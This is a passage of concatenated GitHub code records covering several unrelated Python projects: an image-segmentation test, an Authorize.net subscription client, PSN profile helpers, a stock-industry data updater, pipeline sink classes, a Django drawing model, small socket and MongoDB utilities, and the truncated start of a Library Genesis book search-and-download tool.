money_cap\n\n\n","repo_name":"Vvollono/machine_coffee","sub_path":"coffee_machine_v1.0.py","file_name":"coffee_machine_v1.0.py","file_ext":"py","file_size_in_byte":4240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70560904808","text":"import apoc\nfrom skimage.io import imread, imsave\nfrom pathlib import Path\nimport numpy as np\n\n\ndef test_back_and_forth_feature_ordering():\n root = Path(apoc.__file__).parent\n img_path = str(root / '..' / 'demo' / 'blobs.tif')\n image = imread(img_path)\n\n img_path = str(root / '..' / 'demo' / 'annotations.tif')\n gt_image = imread(img_path)\n\n img_path = str(root / '..' / 'demo' / 'reference_labels.tif')\n ref_image = imread(img_path)\n\n feature_specs = \"original gaussian_blur=1 sobel_of_gaussian_blur=1\"\n\n classifier = apoc.ObjectSegmenter(positive_class_identifier=2, num_ensembles=100)\n classifier.train(feature_specs, gt_image, image)\n\n result1 = classifier.predict(image=image)\n\n feature_specs = \"sobel_of_gaussian_blur=1 gaussian_blur=1 original\"\n\n classifier = apoc.ObjectSegmenter(positive_class_identifier=2, num_ensembles=100)\n classifier.train(feature_specs, gt_image, image)\n\n result2 = classifier.predict(image=image)\n\n binary1 = result1 > 0\n binary2 = result2 > 0\n\n imsave(\"binary1.tif\", binary1)\n imsave(\"binary2.tif\", binary2)\n\n intersection = binary1 * binary2\n union = (binary1 + binary2) > 0\n\n jaccard_index = intersection.sum() / union.sum()\n\n print(jaccard_index)\n\n assert jaccard_index > 0.999\n\n\n","repo_name":"haesleinhuepf/apoc","sub_path":"tests/test_back_and_forth_feature_ordering.py","file_name":"test_back_and_forth_feature_ordering.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"53"}
+{"seq_id":"29888171634","text":"import httplib\ntry:\n from xml.etree import ElementTree\nexcept ImportError:\n # Python < 2.5\n from elementtree import ElementTree\n\n# ARB expects request parameters in a particular order\nREQUEST_KEY_ORDER = (\"merchantAuthentication refId subscriptionId subscription name transactionKey \"\n \"paymentSchedule interval length unit \"\n \"startDate totalOccurrences trialOccurrences amount trialAmount \"\n \"payment creditCard cardNumber expirationDate cardCode bankAccount \"\n \"accountType routingNumber accountNumber nameOnAccount echeckType \"\n \"bankName order invoiceNumber description customer id email \"\n \"phoneNumber faxNumber billTo firstName lastName company address \"\n \"city state zip country shipTo\".split())\n\ndef arb_request_key_order(i):\n try:\n return REQUEST_KEY_ORDER.index(i[0])\n except ValueError:\n raise Exception('Unexpected ARB request key: %s' % i[0])\n\ndef xmlify_dict(d, indent=0):\n s = ''\n for k, v in sorted(d.items(), key=arb_request_key_order):\n if isinstance(v, dict):\n v = '\\n' + xmlify_dict(v, indent + 2) + ' ' * indent\n s += '%s<%s>%s%s>\\n' % (' ' * indent, k, v, k)\n return s\n\ndef dictify_etree_node(node):\n d = {}\n for child in node:\n d[child.tag[child.tag.index('}') + 1:]] = dictify_etree_node(child)\n return d or node.text.strip()\n\nclass ARBConnection(object):\n\n def __init__(self, server, login, key, salt=None, timeout=None):\n self.server = server\n self.login = login\n self.salt = salt\n self.timeout = timeout\n self.key = key\n self.authentication = {\n 'name': self.login,\n 'transactionKey': self.key\n }\n\n def sendTransaction(self, method, **kw):\n kw['merchantAuthentication'] = self.authentication\n \n xml = \"\"\"\n<%s xmlns=\"AnetApi/xml/v1/schema/AnetApiSchema.xsd\">\n%s\n%s>\n\"\"\" % (method, xmlify_dict(kw), method)\n \n if self.server.startswith('localhost:'):\n server, port = self.server.split(':')\n conn = httplib.HTTPConnection(server, port)\n else:\n conn = httplib.HTTPSConnection(self.server, timeout=self.timeout)\n conn.putrequest('POST', '/xml/v1/request.api')\n conn.putheader('content-type', 'text/xml')\n conn.putheader('content-length', len(xml))\n conn.endheaders()\n conn.send(xml)\n\n response = conn.getresponse().read()\n root = ElementTree.fromstring(response)\n result = dictify_etree_node(root)\n result['full_response'] = response\n return result\n\n\nclass ARBProcessor(object):\n def __init__(self, server, login, key, salt=None, timeout=None):\n self.connection = ARBConnection(server, login, key, salt, timeout)\n\n def create(self, **kw):\n if not isinstance(kw['subscription']['amount'], basestring):\n raise ValueError('Subscription amount must be a string')\n if not isinstance(kw['subscription'].get('trialAmount', ''), basestring):\n raise ValueError('Subscription trialAmount must be a string')\n\n return self.connection.sendTransaction('ARBCreateSubscriptionRequest', **kw)\n\n def update(self, **kw):\n return self.connection.sendTransaction('ARBUpdateSubscriptionRequest', **kw)\n\n def cancel(self, **kw):\n return self.connection.sendTransaction('ARBCancelSubscriptionRequest', **kw)\n","repo_name":"collective/getpaid.authorizedotnet","sub_path":"src/getpaid/authorizedotnet/subscription.py","file_name":"subscription.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"30616386964","text":"from psnawp_api import psnawp\nimport userInfo\nimport login\n\n# 유저 인스턴스 선언\nuserInfoInstance = userInfo.UserInfo(login.onlineID, login.npssoCode).GetPlayerInstance()\n\nuserProfile = userInfoInstance.profile()\n\n#print(userProfile)\n\n# 유저의 프로필 사진의 URL을 가져옴\ndef GetUserProfileImageURL():\n profileImageURL = userProfile['personalDetail']['profilePictures'][1]['url'] # size 'm'의 url을 가져옴\n\n return profileImageURL\n\n# 유저의 psn 이름을 가져옴\ndef GetUserProfileName():\n firstName = userProfile['personalDetail']['firstName']\n lastName = userProfile['personalDetail']['lastName']\n fullName = firstName + lastName\n\n return fullName\n\n# 유저의 총 트로피 개수를 가져옴\ndef GetUserProfileTrophies():\n trophySummary = userInfoInstance.GetTrophyProfileSummary()\n\n # 유저의 전체 트로피 개수를 트로피 별로 가져온다\n trophyCount_bronze = trophySummary['earnedTrophies']['bronze']\n trophyCount_silver = trophySummary['earnedTrophies']['silver']\n trophyCount_gold = trophySummary['earnedTrophies']['gold']\n trophyCount_platinum = trophySummary['earnedTrophies']['platinum']\n\n # 전체 트로피 개수\n trophyCount_total = trophyCount_bronze + trophyCount_silver + trophyCount_gold + trophyCount_platinum\n\n # 유저 트로피 정보를 딕셔너리 형태로 내보낸다\n userTrophyCountInfo = {\n 'bronze' : trophyCount_bronze,\n 'silver' : trophyCount_silver,\n 'gold' : trophyCount_gold,\n 'platinum' : trophyCount_platinum,\n 'total' : trophyCount_total\n }\n\n return userTrophyCountInfo\n\n# 유저의 프로필 레벨을 가져옴 (나중에 추가)\ndef GetUserProfileTrophyLevel():\n trophySummary = userInfoInstance.GetTrophyProfileSummary()\n \n return trophySummary['trophyLevel']","repo_name":"snwdaaa/PSAchivementManager","sub_path":"psam/src/getUserInfos.py","file_name":"getUserInfos.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"211572576","text":"\r\nimport os\r\nimport datetime as dt\r\nimport numpy as np\r\nimport pandas as pd\r\nimport scipy.io as scio\r\n\r\nfrom remotewind import w\r\n\r\n\r\n\r\n\r\n\r\ndef get_dict(dtype='change'):\r\n if dtype=='change':\r\n swChangeLevel1 = pd.read_csv(r'E:\\stocks_data\\sw_industry\\change_dict.csv', encoding='gbk')\r\n swChangeDict = {}\r\n for dumi in range(swChangeLevel1.shape[0]):\r\n if swChangeDict.get(swChangeLevel1['swName1Old'][dumi]) is None:\r\n swChangeDict[swChangeLevel1['swName1Old'][dumi]] = [swChangeLevel1['swName1New'][dumi]]\r\n else:\r\n swChangeDict[swChangeLevel1['swName1Old'][dumi]].append(swChangeLevel1['swName1New'][dumi])\r\n return swChangeDict\r\n else:\r\n swNameLevel1 = pd.read_csv(r'E:\\stocks_data\\sw_industry\\sw_dict_level1.csv', encoding='gbk')\r\n swNameCodeDict = {swNameLevel1['swName1'][dumi]: swNameLevel1['swCode1'][dumi] for dumi in range(swNameLevel1.shape[0])}\r\n swNameCodeDict[np.nan] = -1\r\n return swNameCodeDict\r\n\r\nclass CONSTATNS:\r\n LATEST = 20180709\r\n swNameCodeDict = get_dict(dtype='name')\r\n swChangeDict = get_dict(dtype='change')\r\n\r\n\r\ndef date_trans(tdt):\r\n if isinstance(tdt,str):\r\n return int(dt.datetime.strptime(tdt,'%Y/%m/%d').strftime('%Y%m%d'))\r\n elif np.isnan(tdt):\r\n return CONSTATNS.LATEST\r\n\r\ndef history_sw_data():\r\n lastData = pd.read_csv(r'E:\\stocks_data\\sw_industry\\sw_data\\sw_industry_20180709.csv',encoding='gbk')\r\n lastStks = lastData['stkcd'].values\r\n histData = pd.read_csv(r'.\\sw_history.csv',encoding='gbk')\r\n histData.columns = ['stkcd','exchg','stkname','standerd','indate','outdate','swName1','swName2','swName3','isnew']\r\n histData['stkcd'] = histData['stkcd'].map(lambda x:int(x))\r\n histData['indate'] = histData['indate'].map(date_trans)\r\n histData['outdate'] = histData['outdate'].map(date_trans)\r\n trdDates = scio.loadmat(r'E:\\bqfcts\\bqfcts\\data\\trddates.mat')['trddates'][:,0]\r\n stkInfo = scio.loadmat(r'E:\\bqfcts\\bqfcts\\data\\stkinfo.mat')['stkinfo'][:,[0,1,2]] # stkcd and ipo date\r\n stkInfo[:,2] = CONSTATNS.LATEST\r\n offListed = sorted(list(set(stkInfo[:, 0]) - set(lastStks)))\r\n stkInfo = pd.DataFrame(stkInfo,columns=['stkcd','ipo_date','delist_date']).set_index('stkcd')\r\n offListedWind = ['{}.SH'.format(stkcd) if stkcd>=600000 else ''.join(['0'*(5-int(np.log10(stkcd))),'{}.SZ'.format(stkcd)]) for stkcd in offListed]\r\n offListedDate = [int(tdt.strftime('%Y%m%d')) for tdt in w.wss(offListedWind,'delist_date').Data[0]]\r\n stkInfo.loc[offListed,'delist_date'] = offListedDate\r\n stkInfo.reset_index(inplace=True)\r\n for tdt in trdDates:\r\n if tdt>=CONSTATNS.LATEST:\r\n break\r\n listedIdx = np.logical_and(stkInfo['ipo_date'].values<=tdt,stkInfo['delist_date'].values>=tdt)\r\n listedStocks = stkInfo.loc[listedIdx,'stkcd']\r\n histCut = histData.loc[np.isin(histData['stkcd'],listedStocks),:]\r\n histCutIdx = np.logical_and(histCut['indate'].values<=tdt,histCut['outdate'].values>tdt)\r\n histCut = histCut.loc[histCutIdx,['stkcd','swName1','swName2','swName3']]\r\n if histCut.empty:\r\n print('{} is empty'.format(tdt))\r\n histCut.to_csv(os.path.join(r'E:\\stocks_data\\sw_industry\\sw_data','sw_industry_{}.csv'.format(tdt)),index=False)\r\n\r\n\r\ndef sw_leve1_code(swName1,swName2,stkcd,tdate,lastNoChange,firstChange):\r\n if swName1 in CONSTATNS.swNameCodeDict:\r\n code = CONSTATNS.swNameCodeDict[swName1]\r\n elif swName1 in CONSTATNS.swChangeDict:\r\n if len(CONSTATNS.swChangeDict[swName1])==1: # 一一对应,直接返回即可\r\n code = CONSTATNS.swNameCodeDict[CONSTATNS.swChangeDict[swName1][0]]\r\n else: # 旧名 一对多 新名,\r\n # 先通过 二级行业进行匹配\r\n name2Pair = np.array([name in swName2 for name in CONSTATNS.swChangeDict[swName1]])\r\n if swName2 in CONSTATNS.swChangeDict[swName1]: # 二级行业名 变更为 新一级行业名\r\n code = CONSTATNS.swNameCodeDict[swName2]\r\n elif swName1 == '金融服务' and swName2 != '银行': # 非银 特殊处理\r\n code = CONSTATNS.swNameCodeDict['非银金融']\r\n elif swName1 == '信息服务' and swName2=='网络服务':\r\n code = CONSTATNS.swNameCodeDict['计算机']\r\n elif np.any(name2Pair): # 新一级行业 包含于 旧二级行业\r\n code = CONSTATNS.swNameCodeDict[CONSTATNS.swChangeDict[swName1][np.argwhere(name2Pair)[0][0]]]\r\n else: # 二级行业匹配失败,按照行业变更后 该股票所属行业\r\n if stkcd in firstChange.index: # 若该股票行业变动时还为退市,对照改名后该股票所在的行业\r\n newName1 = firstChange.loc[stkcd,'swName1']\r\n if newName1 in CONSTATNS.swChangeDict[swName1]: # 变更后的行业名 处在 变更字典中\r\n code = CONSTATNS.swNameCodeDict[newName1]\r\n else: # 变更后股票未退市,但是该股票发生行业变更,且变更后行业 不属于变更字典,需要特殊处理\r\n code = np.nan\r\n else: # 行业变更时 股票已经退市 匹配失败\r\n code = np.nan\r\n else: #\r\n code = np.nan\r\n if tdate<=20131231: # 使变更前的行业恢复的更加均衡\r\n if (stkcd in firstChange.index) and (stkcd in lastNoChange.index):\r\n newName1 = firstChange.loc[stkcd, 'swName1']\r\n code = CONSTATNS.swNameCodeDict[newName1] if lastNoChange.loc[stkcd,'swName1']==swName1 else code # 与变更前对后一天相同的行业,使用变更后的代码\r\n return code\r\n\r\n\r\ndef update_sw_mat():\r\n\r\n trdDates = scio.loadmat(r'E:\\bqfcts\\bqfcts\\data\\trddates.mat')['trddates'][:, 0]\r\n stkCodes = scio.loadmat(r'E:\\bqfcts\\bqfcts\\data\\stkinfo.mat')['stkinfo'][:, 0]\r\n ##### update mat #####\r\n swPath = r'E:\\stocks_data\\sw_industry\\sw_data'\r\n histMatName = 'data_19901219_20170630'\r\n histPath = os.path.join(r'E:\\bqfcts\\bqfcts\\data\\SW_Industry','{}.mat'.format(histMatName))\r\n if not os.path.exists(histPath):\r\n histStkNum = 3433\r\n histDayNum = 6488\r\n histStks = stkCodes[:histStkNum]\r\n histTrds = trdDates[:histDayNum]\r\n histMat = pd.DataFrame(np.zeros([histStkNum,histDayNum]),index=histStks,columns=histTrds)\r\n firstChange = pd.read_csv(os.path.join(swPath,'sw_industry_20140102.csv'), encoding='gbk').set_index('stkcd')\r\n lastNoChange = pd.read_csv(os.path.join(swPath, 'sw_industry_20131231.csv'), encoding='gbk').set_index('stkcd')\r\n for tdt in histTrds:\r\n swData = pd.read_csv(os.path.join(swPath,'sw_industry_{}.csv'.format(tdt)),encoding='gbk').set_index('stkcd')\r\n swCode1 = []\r\n for stkcd in swData.index.values:\r\n swName1 = swData.loc[stkcd, 'swName1']\r\n swName2 = swData.loc[stkcd, 'swName2']\r\n swCode1.append(sw_leve1_code(swName1=swName1,\r\n swName2=swName2,\r\n stkcd=stkcd,\r\n tdate=tdt,\r\n lastNoChange=lastNoChange,\r\n firstChange=firstChange))\r\n swData['swCode1'] = swCode1\r\n histMat.loc[swData.index,tdt] = swData['swCode1']\r\n print(tdt)\r\n scio.savemat(file_name=histPath, mdict={'swIndustry': histMat.values})\r\n print('hist mat created')\r\n currMatName = 'data_20150701_now'\r\n currPath = os.path.join(r'E:\\bqfcts\\bqfcts\\data\\SW_Industry', '{}.mat'.format(currMatName))\r\n currDayStart = 6000\r\n if not os.path.exists(currPath):\r\n currTrds = trdDates[currDayStart:]\r\n currMat = pd.DataFrame(np.zeros([stkCodes.shape[0], currTrds.shape[0]]), index=stkCodes, columns=currTrds)\r\n for tdt in currTrds:\r\n swData = pd.read_csv(os.path.join(swPath,'sw_industry_{}.csv'.format(tdt)),encoding='gbk').set_index('stkcd')\r\n swData['swCode1'] = swData['swName1'].map(CONSTATNS.swNameCodeDict)\r\n currMat.loc[swData.index,tdt] = swData['swCode1']\r\n print(tdt)\r\n scio.savemat(file_name=currPath, mdict={'swIndustry':currMat.values})\r\n print('curr mat created')\r\n else:\r\n currDates = trdDates[currDayStart:]\r\n currStkcds = stkCodes\r\n currDayNum = currDates.shape[0]\r\n currStkNum = currStkcds.shape[0]\r\n currMatSaved = scio.loadmat(currPath)['swIndustry']\r\n (savedStkNum, savedDayNum) = currMatSaved.shape\r\n if (currDayNum == savedDayNum) and (currStkNum == savedStkNum):\r\n print('no data to update')\r\n return\r\n currTrds = currDates[currDayNum-2:] # 前一天的重新更新,弥补新股\r\n currMat = pd.DataFrame(np.zeros([currStkNum, currDayNum-savedDayNum+1]), index=stkCodes,columns=currTrds)\r\n for tdt in currTrds:\r\n swData = pd.read_csv(os.path.join(swPath, 'sw_industry_{}.csv'.format(tdt)), encoding='gbk').set_index('stkcd')\r\n swData['swCode1'] = swData['swName1'].map(CONSTATNS.swNameCodeDict)\r\n currMat.loc[swData.index, tdt] = swData['swCode1']\r\n patch = np.zeros([currStkNum-savedStkNum, savedDayNum - 1])\r\n currMat = np.column_stack([np.row_stack([currMatSaved[:,:-1],patch]), currMat.values])\r\n scio.savemat(file_name=currPath, mdict={'swIndustry': currMat})\r\n print('curr mat updated')\r\n\r\nif __name__=='__main__':\r\n update_sw_mat()\r\n # pr = scio.loadmat(r'C:\\Users\\Jiapeng\\Desktop\\matlab.mat')['t']\r\n # old = pd.read_csv(r'E:\\stocks_data\\sw_industry\\sw_data\\sw_industry_20131231.csv',encoding='gbk').set_index('stkcd')\r\n # new = pd.read_csv(r'E:\\stocks_data\\sw_industry\\sw_data\\sw_industry_20140102.csv',encoding='gbk').set_index('stkcd')\r\n # data = pd.concat([old.loc[pr[:,0],'swName1'],new.loc[pr[:,0],'swName1']],axis=1)\r\n # data.to_csv(r'E:\\stocks_data\\sw_industry\\tempdict.csv')\r\n","repo_name":"wqxl309/sw_industry","sub_path":"history_sw_industry.py","file_name":"history_sw_industry.py","file_ext":"py","file_size_in_byte":10236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"3227127025","text":"from abc import abstractmethod\n\nfrom .base import Component\nfrom ..utils.filter import filter_dict, load_filter_file\n\n\nclass Sink(Component):\n \"\"\"\n Main base class to implement a Sink.\n \"\"\"\n\n def __init__(\n self, index, type_, id_,\n optional=False, timeout=None, config=None\n ):\n super().__init__(\n index, type_, id_,\n optional=optional, timeout=timeout, config=config\n )\n\n def _component_execute(self, data):\n \"\"\"\n Sink component execute override.\n\n This function will just call the user provided ``distribute()``\n function with the input data and return an empty dictionary\n (\"no data\").\n \"\"\"\n self.distribute(data)\n return {}\n\n @abstractmethod\n def distribute(self, data):\n \"\"\"\n Distribute the collected data.\n\n All sinks subclasses must implement this abstract method.\n\n :param OrderedDict data: The collected data. This dictionary can be\n modified as required without consequences for the pipeline.\n \"\"\"\n pass\n\n\nclass FilterSink(Sink):\n \"\"\"\n Common sink base class that adds several inclusion and exclusion\n configuration options for filtering data before using it.\n\n See :ref:`filter-sink-options` for more information.\n \"\"\"\n\n def declare_config(self, config):\n config.add_option(\n 'include',\n default=['*'],\n optional=True,\n schema={\n 'type': 'list',\n 'schema': {\n 'type': 'string',\n },\n },\n )\n\n config.add_option(\n 'include_files',\n default=[],\n optional=True,\n schema={\n 'type': 'list',\n 'schema': {\n 'type': 'string',\n 'empty': False,\n },\n },\n )\n\n config.add_option(\n 'exclude',\n default=[],\n optional=True,\n schema={\n 'type': 'list',\n 'schema': {\n 'type': 'string',\n },\n },\n )\n\n config.add_option(\n 'exclude_files',\n default=[],\n optional=True,\n schema={\n 'type': 'list',\n 'schema': {\n 'type': 'string',\n 'empty': False,\n },\n },\n )\n\n @abstractmethod\n def distribute(self, data):\n include = self.config.include.value\n for include_file in self.config.include_files.value:\n for pattern in load_filter_file(include_file):\n if pattern not in include:\n include.append(pattern)\n\n exclude = self.config.exclude.value\n for exclude_file in self.config.exclude_files.value:\n for pattern in load_filter_file(exclude_file):\n if pattern not in exclude:\n exclude.append(pattern)\n\n # Optimization when no filter is requested to the input data\n if include == ['*'] and not exclude:\n return\n\n filtered = filter_dict(data, include, exclude)\n data.clear()\n data.update(filtered)\n\n\n__all__ = [\n 'Sink',\n 'FilterSink',\n]\n","repo_name":"kuralabs/flowbber","sub_path":"lib/flowbber/components/sink.py","file_name":"sink.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"18247102533","text":"from datetime import datetime\n\nfrom django.db.models import (\n ForeignKey,\n CharField,\n ImageField,\n Manager,\n ManyToManyField,\n PositiveIntegerField,\n Q,\n)\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom imagekit.models import ImageSpecField\nfrom imagekit.processors import ResizeToCover\nfrom model_utils.models import TimeStampedModel\n\nfrom .watermark import Watermark\n\nDRAWING_STATUS_STORED = 1\nDRAWING_STATUS_RESERVED = 2\nDRAWING_STATUS_SOLD = 3\n\nDRAWING_STATUS_CHOICES = (\n (DRAWING_STATUS_STORED, _('status-for-sale')),\n (DRAWING_STATUS_RESERVED, _('status-reserved')),\n (DRAWING_STATUS_SOLD, _('status-sold')),\n)\n\nDRAWING_AVAILABLE_STATES = [\n DRAWING_STATUS_STORED,\n]\n\n\nclass DrawingManager(Manager):\n def get_available(self):\n return self.filter(status__in=DRAWING_AVAILABLE_STATES)\n\n def get_price(self, ids):\n drawings = self.filter(id__in=ids).all()\n price = 0\n for drawing in drawings:\n price += drawing.get_price()\n\n return price\n\n\nclass Drawing(TimeStampedModel):\n objects = DrawingManager()\n name = CharField(\n max_length=255,\n verbose_name=_('field-name'),\n help_text=_('field-name-help-text'),\n )\n size = ForeignKey(\n 'DrawingSize',\n related_name='drawings',\n verbose_name=_('field-size'),\n )\n status = PositiveIntegerField(\n choices=DRAWING_STATUS_CHOICES,\n default=DRAWING_STATUS_STORED,\n verbose_name=_('field-drawing-status'),\n )\n image = ImageField(\n height_field=\"image_height\",\n upload_to='var/drawings',\n verbose_name=_(\"field-drawing-image\"),\n width_field=\"image_width\",\n )\n image_thumb_detail = ImageSpecField(\n source='image',\n format='JPEG',\n options={'quality': 95},\n processors=[\n ResizeToCover(600, 600),\n Watermark(\n 'web/static/images/watermark-black.png',\n 0.09,\n )\n ],\n )\n image_thumb_list = ImageSpecField(\n source='image',\n format='JPEG',\n options={'quality': 95},\n processors=[\n ResizeToCover(300, 300),\n Watermark(\n 'web/static/images/watermark-white.png',\n 0.1,\n ),\n ],\n )\n image_height = PositiveIntegerField(null=True)\n image_width = PositiveIntegerField(null=True)\n tags = ManyToManyField(\n 'DrawingTag',\n verbose_name=_('field-tags'),\n related_name='drawings',\n )\n\n class Meta:\n verbose_name = _('Drawing')\n verbose_name_plural = _('Drawings')\n\n def __str__(self):\n return '%s (%s)' % (self.name, self.size)\n\n def get_active_price_level(self):\n now = datetime.now()\n return self.price_levels.filter(\n (Q(valid_from__isnull=True) | Q(valid_from__gte=now)) &\n (Q(valid_until__isnull=True) | Q(valid_until__lte=now)),\n ).order_by('-created').first()\n\n def get_price(self):\n price_level = self.get_active_price_level()\n return price_level.price if price_level else None\n\n def is_price_visible(self):\n return self.status in DRAWING_AVAILABLE_STATES\n\n def is_status_visible(self):\n return self.status not in DRAWING_AVAILABLE_STATES\n\n def mark_as_reserved(self):\n self.status = DRAWING_STATUS_RESERVED\n\n def mark_as_sold(self):\n self.status = DRAWING_STATUS_SOLD\n\n def get_title(self):\n return '%s %s' % (self.size.name, self.name) if self.size.standalone_name else self.name\n","repo_name":"just-paja/malickosti-v-akvarelkach","sub_path":"drawings/models/drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"504244575","text":"import socket\r\n\r\nserver_ip = '127.0.0.1'\r\nport = 9999\r\n\r\nclient = socket.socket()\r\n\r\nclient.connect((server_ip, port))\r\nprint('---Connected to server---')\r\n\r\nprint(\"type your name: \")\r\nmsg = input()\r\n\r\nclient.send(bytes(msg, 'utf-8'))\r\nprint('---Sent a message---')\r\n\r\nmsg = client.recv(1024)\r\nprint('---Got a message---')\r\nprint(msg)\r\n\r\nclient.close()\r\n","repo_name":"MysteryHub32/MysteryHub32","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"3188205459","text":"from mongoengine import Document, DateTimeField, BooleanField\nimport datetime\n\nclass BaseDocument(Document):\n meta = {'allow_inheritance': True}\n created_on = DateTimeField()\n modified_on = DateTimeField()\n deleted = BooleanField(default=False)\n\n def save(self, *args, **kwargs):\n if not self.created_on:\n self.created_on = datetime.datetime.now()\n self.modified_on = datetime.datetime.now()\n super(BaseDocument, self).save(*args, **kwargs)\n","repo_name":"ismail2smile/BookingHotel","sub_path":"baseDocumentConfig.py","file_name":"baseDocumentConfig.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"5722941418","text":"import fitz\nimport requests\nimport time\nfrom bs4 import BeautifulSoup\nimport webbrowser \nfrom pandas import Series\nfrom pandas import DataFrame\nfrom pandas import read_html\nfrom numpy import array\nimport os\nfrom os import remove as os_remove\nfrom os import path as os_path\nfrom os import stat\nfrom os.path import exists\nfrom threading import Thread\nfrom socket import gethostbyname\nfrom socket import gethostname\nfrom pathlib import Path\nfrom download import download\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom tkinter import Tk\nfrom tkinter import PhotoImage\nfrom tkinter import Canvas\nfrom tkinter import Label\nfrom tkinter import Text\nfrom tkinter import Button\nfrom tkinter import messagebox\n# --------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef epub_to_pdf_gen(): \n downloads_path = str(Path.home() / \"Downloads\")\n for fname in os.listdir(downloads_path):\n if fname.endswith('.epub'):\n fname_n = fname.split('.epub')[0]\n file_path_epub = f\"{downloads_path}\\\\{fname_n}.epub\"\n file_path_pdf = f\"{downloads_path}\\\\{fname_n}.pdf\"\n try:\n doc = fitz.open(file_path_epub)\n a = doc.convert_to_pdf()\n pdf = fitz.open(\"pdf\", a)\n pdf.save(file_path_pdf)\n doc.close()\n os_remove(file_path_epub)\n except:\n pass\n# --------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef remove_character_not_valid_in_pdfname(a):\n char_list = \"/:?*<>|\"\n for i in char_list:\n a = a.replace(i, \"\")\n return a\n# -------------------------------------------------------------------------------------------------------------------------------------------------------------------\npdf_size_to_download_for_zlib = \"\"\nbyte_info_for_pdfdrive = \"\"\nkeep_running = True\n# --------------------------------------------------------- LIBGEN -----------------------------------------------------------------------------------------\ndef downloaded_stat_for_libgen(Pdf_file_size_to_download):\n global keep_running\n while keep_running:\n for fname in os.listdir(downloads_path):\n if fname.endswith('.part'):\n try:\n file_size = os.path.getsize(f\"{downloads_path}\\\\{fname}\")\n info_text.config(text=f'Downloading....{round((file_size / (1024 * 1024)),1)} {Pdf_file_size_to_download.split()[1]} / {Pdf_file_size_to_download}')\n time.sleep(0.2) \n except Exception as e:\n print(e)\n if(keep_running == False):\n break\ndef search_in_libgen(author_searched_by_user, book_searched_by_user, extension):\n author = author_searched_by_user\n to_search = book_searched_by_user \n pdf_title = to_search\n to_search_online = to_search.replace(\" \", \"+\")\n link_to_search = f\"https://libgen.is/search.php?req={to_search_online}&open=0&res=100&view=simple&phrase=1&column=title\"\n download_of_libgen_completed = False\n # ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n list_of_dataframes = read_html(link_to_search)\n table = list_of_dataframes[2]\n a = list(table.loc[0])\n table.columns = a\n table.drop(0, axis=0, inplace=True)\n table.reset_index(inplace=True)\n table = table[(table['Extension'] == extension)]\n table.sort_values('Year', ascending=False, inplace=True)\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------\n result = requests.get(link_to_search)\n soup = BeautifulSoup(result.text, \"lxml\")\n titles_list = [soup.find_all('a', id=x)[0].getText() for x in table['ID']]\n table['Title'] = Series(titles_list, index=table.index, dtype='str')\n table = table.astype({'Author(s)': str, 'Title': str})\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n table_2 = table[['Author(s)', 'Title']]\n index_number = 0\n # ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n def check_for_author(index_for_author):\n actual_author_name = table_2['Author(s)'][index_for_author].split(\" \") \n result = False\n for word in actual_author_name:\n if (word in author):\n result = True\n break\n if(len(author) == 0):\n result = True\n return result\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n def check_for_title(title_of_book):\n len_of_book_searched = len(to_search.split(\" \"))\n len_of_book_by_libgen = len(title_of_book.split(\" \"))\n split_of_book_by_user = to_search.lower().split(\" \")\n split_of_book_by_libgen = title_of_book.lower().split(\" \")\n no_of_matches = 0\n if(len_of_book_searched <= len_of_book_by_libgen):\n for i in range(0, len_of_book_searched):\n if(split_of_book_by_libgen[i].lower() in split_of_book_by_user[i].lower()):\n no_of_matches += 1\n if(no_of_matches != len_of_book_searched):\n no_of_matches = 0\n for i in range(0, len_of_book_searched):\n if(split_of_book_by_user[i].lower() in split_of_book_by_libgen[i].lower()):\n no_of_matches += 1\n else:\n for i in range(0, len_of_book_by_libgen):\n if(split_of_book_by_libgen[i].lower() in split_of_book_by_user[i].lower()):\n no_of_matches += 1\n if(no_of_matches != len_of_book_by_libgen):\n no_of_matches = 0\n for i in range(0, len_of_book_by_libgen):\n if(split_of_book_by_user[i].lower() in split_of_book_by_libgen[i].lower()):\n no_of_matches += 1\n return ((no_of_matches == len_of_book_searched) or (no_of_matches == len_of_book_by_libgen))\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n book_found = False\n for i in table_2.index:\n if((check_for_title(table_2['Title'][i])) & (check_for_author(i))):\n book_found = True\n index_number = i\n break\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n if(book_found):\n result = requests.get(link_to_search)\n soup = BeautifulSoup(result.text, \"lxml\")\n a = soup.select(\".c > tr > td > a\")\n c = []\n for i in a:\n b = i.get('href')\n if(b.find(\"book\") == 0):\n c.append(b.split(\"=\")[1])\n index_of_book_to_download = c\n link_of_download_page = f\"http://library.lol/main/{index_of_book_to_download[index_number]}\"\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n result_2 = requests.get(link_of_download_page)\n soup = 